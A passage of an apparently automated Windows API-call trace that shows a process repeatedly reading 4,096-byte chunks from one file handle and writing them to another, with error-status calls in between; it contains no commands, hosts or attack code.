nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.138] GetLastError () returned 0x0 [0095.138] SetLastError (dwErrCode=0x0) [0095.139] GetLastError () returned 0x0 [0095.139] SetLastError (dwErrCode=0x0) [0095.139] GetLastError () returned 0x0 [0095.139] SetLastError (dwErrCode=0x0) [0095.139] GetLastError () returned 0x0 [0095.139] SetLastError (dwErrCode=0x0) [0095.139] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.139] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.139] GetLastError () returned 0x0 [0095.139] SetLastError (dwErrCode=0x0) [0095.139] GetLastError () returned 0x0 [0095.139] SetLastError (dwErrCode=0x0) [0095.140] GetLastError () returned 0x0 [0095.140] SetLastError (dwErrCode=0x0) [0095.140] GetLastError () returned 0x0 [0095.140] SetLastError (dwErrCode=0x0) [0095.140] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.140] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.140] GetLastError () returned 0x0 [0095.140] SetLastError (dwErrCode=0x0) [0095.140] GetLastError () returned 0x0 [0095.140] SetLastError (dwErrCode=0x0) [0095.140] GetLastError () returned 0x0 [0095.140] SetLastError (dwErrCode=0x0) [0095.141] GetLastError () returned 0x0 [0095.141] SetLastError (dwErrCode=0x0) [0095.141] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.141] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.141] GetLastError () returned 0x0 [0095.141] SetLastError (dwErrCode=0x0) [0095.141] GetLastError () returned 0x0 [0095.141] SetLastError (dwErrCode=0x0) [0095.141] GetLastError () returned 0x0 [0095.141] SetLastError (dwErrCode=0x0) [0095.141] GetLastError () returned 0x0 [0095.141] SetLastError (dwErrCode=0x0) [0095.142] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.142] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.142] GetLastError () returned 0x0 [0095.142] SetLastError (dwErrCode=0x0) [0095.142] GetLastError () returned 0x0 [0095.142] SetLastError (dwErrCode=0x0) [0095.142] GetLastError () returned 0x0 [0095.142] SetLastError (dwErrCode=0x0) [0095.142] GetLastError () returned 0x0 [0095.142] SetLastError (dwErrCode=0x0) [0095.143] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.143] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.143] GetLastError () returned 0x0 [0095.143] SetLastError (dwErrCode=0x0) [0095.143] GetLastError () returned 0x0 [0095.143] SetLastError (dwErrCode=0x0) [0095.143] GetLastError () returned 0x0 [0095.143] SetLastError (dwErrCode=0x0) [0095.143] GetLastError () returned 0x0 [0095.143] SetLastError (dwErrCode=0x0) [0095.143] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.143] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.144] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] GetLastError () returned 0x0 [0095.144] SetLastError (dwErrCode=0x0) [0095.144] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.145] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.145] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] GetLastError () returned 0x0 [0095.145] SetLastError (dwErrCode=0x0) [0095.145] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.146] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.146] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.146] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.146] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.146] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.146] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.146] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.146] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.146] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.146] GetLastError () returned 0x0 [0095.146] SetLastError (dwErrCode=0x0) [0095.147] GetLastError () returned 0x0 [0095.147] SetLastError (dwErrCode=0x0) [0095.147] GetLastError () returned 0x0 [0095.147] SetLastError (dwErrCode=0x0) [0095.147] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.147] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.147] GetLastError () returned 0x0 [0095.147] SetLastError (dwErrCode=0x0) [0095.147] GetLastError () returned 0x0 [0095.147] SetLastError (dwErrCode=0x0) [0095.147] GetLastError () returned 0x0 [0095.147] SetLastError (dwErrCode=0x0) [0095.147] GetLastError () returned 0x0 [0095.147] SetLastError (dwErrCode=0x0) [0095.147] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.147] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.148] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] GetLastError () returned 0x0 [0095.148] SetLastError (dwErrCode=0x0) [0095.148] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.148] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.149] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] GetLastError () returned 0x0 [0095.149] SetLastError (dwErrCode=0x0) [0095.149] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.150] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.150] GetLastError () returned 0x0 [0095.150] SetLastError (dwErrCode=0x0) [0095.150] GetLastError () returned 0x0 [0095.150] SetLastError (dwErrCode=0x0) [0095.150] GetLastError () returned 0x0 [0095.150] SetLastError (dwErrCode=0x0) [0095.150] GetLastError () returned 0x0 [0095.150] SetLastError (dwErrCode=0x0) [0095.150] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.151] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.151] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.151] GetLastError () returned 0x0 [0095.151] SetLastError (dwErrCode=0x0) [0095.152] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.152] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.152] GetLastError () returned 0x0 [0095.152] SetLastError (dwErrCode=0x0) [0095.152] GetLastError () returned 0x0 [0095.152] SetLastError (dwErrCode=0x0) [0095.152] GetLastError () returned 0x0 [0095.152] SetLastError (dwErrCode=0x0) [0095.152] GetLastError () returned 0x0 [0095.152] SetLastError (dwErrCode=0x0) [0095.152] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.152] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.152] GetLastError () returned 0x0 [0095.152] SetLastError (dwErrCode=0x0) [0095.152] GetLastError () returned 0x0 [0095.152] SetLastError (dwErrCode=0x0) [0095.153] GetLastError () returned 0x0 [0095.153] SetLastError (dwErrCode=0x0) [0095.153] GetLastError () returned 0x0 [0095.153] SetLastError (dwErrCode=0x0) [0095.153] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.153] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.153] GetLastError () returned 0x0 [0095.153] SetLastError (dwErrCode=0x0) [0095.153] GetLastError () returned 0x0 [0095.153] SetLastError (dwErrCode=0x0) [0095.153] GetLastError () returned 0x0 [0095.153] SetLastError (dwErrCode=0x0) [0095.153] GetLastError () returned 0x0 [0095.153] SetLastError (dwErrCode=0x0) [0095.153] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.153] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.153] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.154] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] GetLastError () returned 0x0 [0095.154] SetLastError (dwErrCode=0x0) [0095.154] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.154] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.155] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] GetLastError () returned 0x0 [0095.155] SetLastError (dwErrCode=0x0) [0095.155] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.462] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.462] GetLastError () returned 0x0 [0095.462] SetLastError (dwErrCode=0x0) [0095.462] GetLastError () returned 0x0 [0095.462] SetLastError (dwErrCode=0x0) [0095.462] GetLastError () returned 0x0 [0095.462] SetLastError (dwErrCode=0x0) [0095.463] GetLastError () returned 0x0 [0095.463] SetLastError (dwErrCode=0x0) [0095.463] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.463] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.463] GetLastError () returned 0x0 [0095.463] SetLastError (dwErrCode=0x0) [0095.463] GetLastError () returned 0x0 [0095.463] SetLastError (dwErrCode=0x0) [0095.463] GetLastError () returned 0x0 [0095.464] SetLastError (dwErrCode=0x0) [0095.464] GetLastError () returned 0x0 [0095.464] SetLastError (dwErrCode=0x0) [0095.464] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.464] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.464] GetLastError () returned 0x0 [0095.464] SetLastError (dwErrCode=0x0) [0095.464] GetLastError () returned 0x0 [0095.464] SetLastError (dwErrCode=0x0) [0095.464] GetLastError () returned 0x0 [0095.464] SetLastError (dwErrCode=0x0) [0095.464] GetLastError () returned 0x0 [0095.464] SetLastError (dwErrCode=0x0) [0095.465] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.465] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.465] GetLastError () returned 0x0 [0095.465] SetLastError (dwErrCode=0x0) [0095.465] GetLastError () returned 0x0 [0095.465] SetLastError (dwErrCode=0x0) [0095.465] GetLastError () returned 0x0 [0095.465] SetLastError (dwErrCode=0x0) [0095.465] GetLastError () returned 0x0 [0095.465] SetLastError (dwErrCode=0x0) [0095.465] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.466] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.466] GetLastError () returned 0x0 [0095.466] SetLastError (dwErrCode=0x0) [0095.466] GetLastError () returned 0x0 [0095.466] SetLastError (dwErrCode=0x0) [0095.466] GetLastError () returned 0x0 [0095.466] SetLastError (dwErrCode=0x0) [0095.466] GetLastError () returned 0x0 [0095.466] SetLastError (dwErrCode=0x0) [0095.466] ReadFile (in: hFile=0x33c, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0095.467] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0095.467] GetLastError () returned 0x0 [0095.467] SetLastError (dwErrCode=0x0) [0095.467] GetLastError () returned 0x0 [0095.467] 